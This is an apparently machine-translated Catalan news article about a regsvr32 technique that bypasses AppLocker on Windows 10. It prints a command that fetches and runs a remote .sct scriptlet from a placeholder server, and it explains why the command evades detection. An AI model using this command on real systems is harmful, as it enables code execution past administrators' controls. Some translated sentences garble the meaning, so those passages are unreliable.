Regsvr32 es pot utilitzar per passar per alt l'aplicació d'aplicacions a Windows 10
Vídeo: Use AppLocker to block Solitaire 2024
Un investigador de Colorado que porta el nom, Casey Smith, ha descobert que Regsvr32 es pot utilitzar per ocultar AppLocker a Windows 10, i això suposa un gran problema per als usuaris d’ordinadors, especialment els que es troben en l’entorn empresarial.
AppLocker es va introduir per primera vegada a Windows 7 i Windows Server 2008 R2. Està dissenyat per permetre als administradors especificar quin grup o usuaris poden aprofitar algunes o totes les aplicacions en funció de la identitat única dels fitxers. Si sou una persona que tendeix a utilitzar AppLocker, haureu de saber que es pot utilitzar per crear determinades regles per permetre que les aplicacions s’executin o s’aturen a les seves pistes.
Per a aquells que desconeixin, Regvr32 es pot utilitzar per registrar i registrar DLLs. No es tracta d’una eina d’un clic, ja que és una utilitat de la línia d’ordres, per la qual cosa només els usuaris d’ordinadors avançats haurien de buscar aprofitar el que ofereix.
Entenem que utilitzant aquesta tècnica no modifica el registre del sistema informàtic, cosa que fa que els administradors puguin saber si s’han realitzat canvis.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"El més increïble aquí és que regsvr32 ja té coneixement de proxy, utilitza TLS, segueix redireccions, etc. … I … Heu endevinat un binari MS predeterminat signat per defecte. Així, tot el que heu de fer és allotjar el vostre fitxer.sct en una ubicació que controleu ", va escriure Smith.
La tècnica anterior no requereix privilegis administratius i no modifica el registre. A més, es poden utilitzar els scripts tant a HTTP com a HTTPS. De moment, Microsoft no ha llançat cap pedaç per aquest petit problema, de manera que l’única opció en aquest moment és bloquejar Regsvr32 mitjançant el tallafoc de Windows.
Curiosament, el gegant del programari encara no ha donat resposta a aquest problema de seguretat que s’enfronta al seu sistema operatiu. Ara que està a la intempèrie, esperem escoltar alguna cosa de la companyia juntament amb les converses d’un futur pegat.
Aplicació Ebay per a Windows 10: què va passar?
EBay ha arribat per a Windows 8 i Windows RT. Llegiu el nostre comentari per saber si s’adapta a les vostres necessitats de compravenda en línia.
Com passar: moure les aplicacions d'un monitor a un altre a Windows 10
Windows 10 us permet moure fàcilment les aplicacions des del primer monitor al segon monitor. A continuació, es mostren dues solucions sobre com realitzar aquesta acció al vostre PC.
Windows phone 10 per obtenir un pagament amb nfc, el mateix que pot passar amb Windows 10?
Windows Phone augmenta la seva quota de mercat per any. El 2012, aquest sistema operatiu va ocupar el quart lloc i el 2013 va ser la tercera plataforma de telefonia mòbil més utilitzada. Aparentment, les ambicions de Microsoft no s’han aturat aquí, ja que la companyia té previst integrar sistemes de pagament NFC de nova generació a Windows Phone 10. La competència és ferotge ...
